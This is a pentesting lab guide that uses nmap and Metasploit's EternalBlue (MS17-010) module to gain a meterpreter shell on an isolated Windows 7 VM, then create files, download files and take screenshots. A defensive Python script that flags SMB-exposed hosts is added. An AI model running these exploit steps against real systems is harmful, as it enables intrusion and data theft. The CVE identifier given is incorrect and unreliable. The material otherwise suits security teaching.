Metasploit EternalBlue Pentesting Guide

This document describes a pentesting attack using Metasploit against a Windows 7 virtual machine. It explains how to scan the target machine with Nmap to find open ports, then use the EternalBlue exploit from Metasploit to gain remote shell access through the compromised SMB protocol. Once inside, the document shows how to create and download files and take screenshots of the attacked machine to verify access.

Pentesting Practice with Metasploit

In this practice, we will carry out an attack with Metasploit using the Windows 7 exploit known as EternalBlue. This exploit takes advantage of a vulnerability in the Windows SMB protocol (port 445). The vulnerability, denoted CVE-2017-014478 in the Common Vulnerabilities and Exposures (CVE) catalog, is due to the fact that version 1 of the SMB server (SMBv1) in various versions of Microsoft Windows accepts specially crafted packets from remote attackers, allowing them to execute code on the targeted computer.

To carry out this attack, we will use an isolated environment composed of two virtual machines: one with Kali Linux ([Link]) in any version and another with Windows 7 Service Pack 1 in any edition ([Link]).

To begin, we first need both machines to be networked. To check this, we ping from each machine to the other.

As we can see, the Windows machine is not responding. This is because the firewall, by default, blocks incoming ICMP requests as a security measure. Another obstacle the firewall puts in our way in this case is that it denies SMB requests, which does not happen in environments where files and printers are shared. Because of this, we will disable the firewall so that the attack can be carried out successfully.

To disable the firewall, we must first go to the Control Panel. To do this, click the Start button and then Control Panel in its right-hand section. Once in the Control Panel, go to the System and Security section. Next, open Windows Firewall. Here, in the left-hand section, click Turn Windows Firewall on or off. Finally, turn the firewall off and click OK.

Once the machines "can see" each other, we proceed to carry out the attack:

A. First, we perform a port scan on the victim machine (W7) with Nmap:
• Black box: we assume that we do not know the IP of the devices on the network, so we scan all the devices on the network with the following command: sudo nmap -O [Link]/24 (the -O option will also tell us what OS the scanned device is running).
What port or ports are open? What is the OS?

• White box: when we know the IP, operating system, etc. of the target machine, we scan only it:
sudo nmap -sV -v -n [Link] (IP of your Windows 7 machine)

For a more thorough scan: sudo nmap -sVC -sC --open -sS -vvv -n -Pn [Link]
Which ports are vulnerable?
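As an added example (not part of the original practice), the following Python script answers the two questions above from Nmap's grepable output (nmap -O -oG): for each host it lists the open TCP ports and the OS guess, and it singles out the hosts that expose SMB on TCP 445, which are the ones a defender would schedule for the MS17-010 patch or SMBv1 removal. The scan text and the 192.168.56.0/24 range are constructed for the example.

```python
"""Summarise SMB (TCP 445) exposure and OS guesses from Nmap -oG output.

Added example, not from the original handout. The sample scan text below is
constructed to mirror the layout of `nmap -O -oG - 192.168.56.0/24`.
"""

# Constructed sample: one tab-separated "Key: value" record per host line.
SAMPLE_GREPABLE = """\
# Nmap scan initiated (constructed sample): nmap -O -oG - 192.168.56.0/24
Host: 192.168.56.1 ()\tStatus: Up
Host: 192.168.56.1 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (999)\tOS: Linux 5.X
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (997)\tOS: Microsoft Windows 7 SP1
Host: 192.168.56.102 ()\tPorts: 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (999)
# Nmap done (constructed sample): 256 IP addresses (3 hosts up) scanned
"""

SMB_PORT = 445


def parse_grepable(text):
    """Return {ip: {"open_ports": [int], "os": str | None}} from -oG text."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue  # skip the "# Nmap ..." banner and trailer lines
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ip = fields["Host"].split()[0]  # "192.168.56.1 ()" -> "192.168.56.1"
        entry = hosts.setdefault(ip, {"open_ports": [], "os": None})
        # Each port entry is port/state/proto/owner/service/rpc/version/
        for port_spec in fields.get("Ports", "").split(","):
            parts = port_spec.strip().split("/")
            if len(parts) >= 3 and parts[1] == "open" and parts[2] == "tcp":
                entry["open_ports"].append(int(parts[0]))
        if "OS" in fields:
            entry["os"] = fields["OS"]
    return hosts


def smb_exposed_hosts(hosts):
    """IPs answering on TCP 445: the ones to check for MS17-010 and SMBv1."""
    return sorted(ip for ip, h in hosts.items() if SMB_PORT in h["open_ports"])


if __name__ == "__main__":
    inventory = parse_grepable(SAMPLE_GREPABLE)
    for ip in smb_exposed_hosts(inventory):
        print(f"{ip}: TCP 445 open, OS guess: {inventory[ip]['os'] or 'unknown'}")
```

Replace SAMPLE_GREPABLE with the contents of a real -oG file to run the same inventory against your own lab scan.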

We launch the exploit to check that the Windows 7 machine has the vulnerability:
• We open Metasploit from the Kali console with the command: msfconsole
• Once it has opened, we search for the exploit with the command: search eternal
• In this case, we will use the second exploit (exploit/windows/smb/ms17_010_eternalblue), so we type: use 2

• Once we have selected the exploit we will use, we type show options to see the parameters used by the exploit.

To set up this exploit, some parameters are mandatory and others are not; in our case the missing parameter is RHOSTS (remote or targeted host, the W7 machine), which is the IP (or IPs) that will be attacked.

• To set the Windows machine as the target, we type: set RHOSTS target_ip ([Link])
• Also check that the IP in the LHOST parameter (the local Kali host) is correct ([Link]).
Once these parameters are configured, review them again with show options to check that we have set the correct values.
Once this is done, you just need to run the exploit by typing exploit.

Now we have access to the target machine through a shell. To see the commands we can use, type help:
meterpreter > help
We can use, for example: pwd, ls, cd, mkdir, edit filename
1. Using these commands, create a file on the desktop of the attacked machine from the Kali machine.
2. Create a text file on the desktop of the Windows 7 machine and download it to the Kali machine using the download command.
3. Take a screenshot of the attacked machine with [Link], then check the content of the .jpeg file created on the Kali machine.

Carry out the practice, explaining the process and taking screenshots of it.
